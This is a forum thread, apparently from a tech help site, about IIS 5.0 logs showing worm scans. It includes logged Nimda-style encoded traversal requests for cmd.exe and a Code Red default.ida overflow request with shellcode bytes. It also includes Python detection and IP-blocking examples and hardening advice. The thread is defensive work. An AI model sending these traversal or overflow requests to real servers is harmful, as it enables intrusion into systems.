nonsence

asked on

IIS 5.0 log files produce odd url requests

I'm almost sure this is either a virus like Code Red or Nimda, but I also think it's intentionally done. I believe someone is trying to find an exploit for my web server, which is Windows 2000 Advanced Server with Service Pack 3 and IIS 5.0.
Below is a brief look at the log file that the connection scanning me has made. I'm just interested if someone can tell me if I'm right, and also how to prevent against future attacks, etc.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-16 00:27:37
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:42 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:42:16 202.100.108.18 - 22.22.22.22 80 GET / - 400 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.224 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:42:59 24.198.93.214 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.224 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:05 24.198.93.214 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 01:07:00 24.42.100.192 - 22.22.22.22 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

For security reasons I changed my IP to 22.22.22.22.
OK, well, if anyone can give me some more insight into this, a link to a web site, a tutorial on IIS logging and how to determine hacker attacks would be great too. Thanks.
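The log excerpt above can be checked mechanically rather than by eye. The following is an added Python example, not code from this thread, from Microsoft or from URLScan: it parses the W3C extended format that IIS 5.0 writes (the #Fields directive names the columns), tags each request with the worm-scan patterns visible in the excerpt (root.exe and cmd.exe probes, '..' followed by a percent-escape or a non-ASCII byte, the default.ida request carrying %u-encoded bytes), and counts the tags per client address. The embedded SAMPLE_LOG is a constructed, cut-down copy of the excerpt plus one ordinary request; the tag names and the classify() rules are this example's own.

```python
"""Tag IIS W3C-extended log lines that match the worm-scan patterns seen in
the question and summarise the hits per client address.  Added example;
the pattern names are this example's own, not IIS or URLScan terminology."""
import re
from collections import Counter, defaultdict

# Constructed sample: a cut-down copy of the excerpt in the question, plus one
# ordinary request (10.0.0.5) so the example shows a line that is NOT flagged.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-16 00:27:37
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..\u00c1../..\u00c1../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:42:16 202.100.108.18 - 22.22.22.22 80 GET / - 400 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.22 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 01:07:00 24.42.100.192 - 22.22.22.22 80 GET /default.ida XXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a 200 -
2003-03-16 01:10:00 10.0.0.5 - 22.22.22.22 80 GET /index.htm - 200 Mozilla/4.0
"""

# '..' followed by a percent-escape or a non-ASCII byte: the separator (or the
# dots themselves) were encoded so that the server's '..' check is skipped and
# only the later decode step turns the path into a real traversal.
ENCODED_TRAVERSAL = re.compile(r"\.\.(?:%[0-9a-fA-F]{2}|[^\x00-\x7f])")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("request line before any #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip it rather than mis-align the columns
        yield dict(zip(fields, values))


def classify(entry):
    """Return the list of pattern names a single parsed request matches."""
    stem, query = entry["cs-uri-stem"], entry["cs-uri-query"]
    low = stem.lower()
    tags = []
    if low.endswith("/root.exe"):
        tags.append("root.exe")          # copy of cmd.exe left behind by earlier worms
    if low.endswith("/cmd.exe"):
        tags.append("cmd.exe")           # command shell requested through the web server
    if ENCODED_TRAVERSAL.search(stem):
        tags.append("encoded-traversal")
    if low == "/default.ida" and "%u" in query:
        tags.append("default.ida")       # Code Red style ISAPI overflow request
    if tags and query.lower().startswith("/c+"):
        tags.append("shell-argument")    # the '/c dir' argument handed to the shell
    return tags


def summarize(text):
    """Map each client IP with at least one hit to a Counter of pattern names."""
    hits = defaultdict(Counter)
    for entry in parse_w3c(text):
        for tag in classify(entry):
            hits[entry["c-ip"]][tag] += 1
    return dict(hits)


def report(text):
    """One line per flagged client, most hits first."""
    lines = []
    ranked = sorted(summarize(text).items(), key=lambda kv: -sum(kv[1].values()))
    for ip, counts in ranked:
        detail = ", ".join(f"{tag}={n}" for tag, n in sorted(counts.items()))
        lines.append(f"{ip}: {sum(counts.values())} hits ({detail})")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

Run against a real log the same way (read the file, pass its text to report()). The 404 and 500 status codes in the excerpt mean none of the probes found their target, which is what the summary is for: it tells you which addresses scanned you, not that they got in; any 200 against cmd.exe or root.exe would be the line to worry about.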
ASKER CERTIFIED SOLUTION
PaulBobby

Here's a tip: many of these attacks, and future attacks, revolve around privilege escalation: the attacker's code runs under the powerful SYSTEM account. Notice how the code is going after cmd.exe?

Apply NTFS permissions to CMD.exe denying the SYSTEM account access to that file. They'll be prevented from executing the code, and any future code will be stymied as well, assuming it uses privilege escalation.

Keep in mind: this will not cause issues with scripts. It WILL prevent win2k "File System Protection" from being able to update the file. To me, a minor tradeoff.
sKuLLsHoT

I would install the URLScan filter from Microsoft onto your server; it will catch malicious requests such as this and log them separately. Also look at Microsoft's IISLockD tool. Although it's Microsoft, these 2 utilities can go a long way to making IIS very secure.

One final thing to look at is Microsoft Baseline Security Analyzer - it gets all the hotfixes and security patches you need for the system.

All these can be found on Microsoft's IIS website, but using Google to find the tools is probably much easier.
nonsence

ASKER

I know about URLScan and IISLockD. I also use SecureIIS and ServerMask as two 3rd-party tools. Anyone know any others?

There isn't by chance something smart enough that can log such activity and then block incoming access from the attacking IP address for, let's say, a few hours to a day, is there?
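The time-limited blocking asked about here is a small piece of logic once the log lines have been classified. The following is an added Python example, not a tool from this thread: a sliding-window counter that blocks an address after a threshold of flagged hits inside a short window and lets the block lapse after a fixed period, so a dynamic or shared address is not banned forever. The FLAGGED list is constructed from the timestamps in the question's excerpt; the class and its parameters (threshold, window, block_for) are this example's own, and it only computes the decisions, leaving enforcement to a firewall rule or an IIS IP restriction.

```python
"""Sliding-window, time-limited blocking of addresses that keep sending flagged
requests.  Added example; it only computes the block decisions, the actual
enforcement (a firewall rule, an IIS IP restriction) is outside this code."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def parse_stamp(stamp):
    """Turn the 'date time' prefix of a W3C log line into a datetime."""
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")


class TempBlocker:
    def __init__(self, threshold=3, window=timedelta(minutes=1),
                 block_for=timedelta(hours=2)):
        self.threshold = threshold        # flagged hits needed within `window`
        self.window = window
        self.block_for = block_for        # how long a block lasts before it lapses
        self.recent = defaultdict(deque)  # ip -> timestamps of recent flagged hits
        self.blocked_until = {}           # ip -> datetime at which the block expires

    def is_blocked(self, ip, now):
        """True while the address is inside its block period; lapsed blocks are dropped."""
        until = self.blocked_until.get(ip)
        if until is None:
            return False
        if now >= until:
            del self.blocked_until[ip]    # block has lapsed: lift it
            return False
        return True

    def record(self, ip, when):
        """Record one flagged request; return True if this hit triggered a block."""
        if self.is_blocked(ip, when):
            return False                  # already blocked, nothing new to decide
        q = self.recent[ip]
        q.append(when)
        while q and when - q[0] > self.window:   # forget hits outside the window
            q.popleft()
        if len(q) >= self.threshold:
            self.blocked_until[ip] = when + self.block_for
            q.clear()
            return True
        return False

    def active(self, now):
        """Sorted list of addresses currently blocked."""
        return sorted(ip for ip in list(self.blocked_until) if self.is_blocked(ip, now))


# Constructed: (timestamp, client IP) pairs of flagged requests, using the
# timestamps that appear in the question's log excerpt.
FLAGGED = [
    ("2003-03-16 00:27:37", "24.76.172.162"),
    ("2003-03-16 00:27:38", "24.76.172.162"),
    ("2003-03-16 00:27:39", "24.76.172.162"),
    ("2003-03-16 00:27:40", "24.76.172.162"),
    ("2003-03-16 00:42:58", "24.198.93.214"),
    ("2003-03-16 00:43:01", "24.198.93.214"),
    ("2003-03-16 01:07:00", "24.42.100.192"),
]


def replay(events, **kwargs):
    """Feed events through a TempBlocker; return it and the (time, ip) pairs that triggered a block."""
    blocker = TempBlocker(**kwargs)
    triggered = []
    for stamp, ip in events:
        if blocker.record(ip, parse_stamp(stamp)):
            triggered.append((stamp, ip))
    return blocker, triggered


if __name__ == "__main__":
    blocker, triggered = replay(FLAGGED)
    for stamp, ip in triggered:
        print(f"{stamp} block {ip} until {blocker.blocked_until[ip]}")
```

With the defaults, 24.76.172.162 is blocked at its third hit and the block lapses two hours later; 24.198.93.214 sends only two flagged requests and is never blocked. Pick the threshold so that a single odd request from a real visitor does not trip it, and keep the block period short enough that a scan coming from a dial-up or proxy address does not lock out the next user of that address for long.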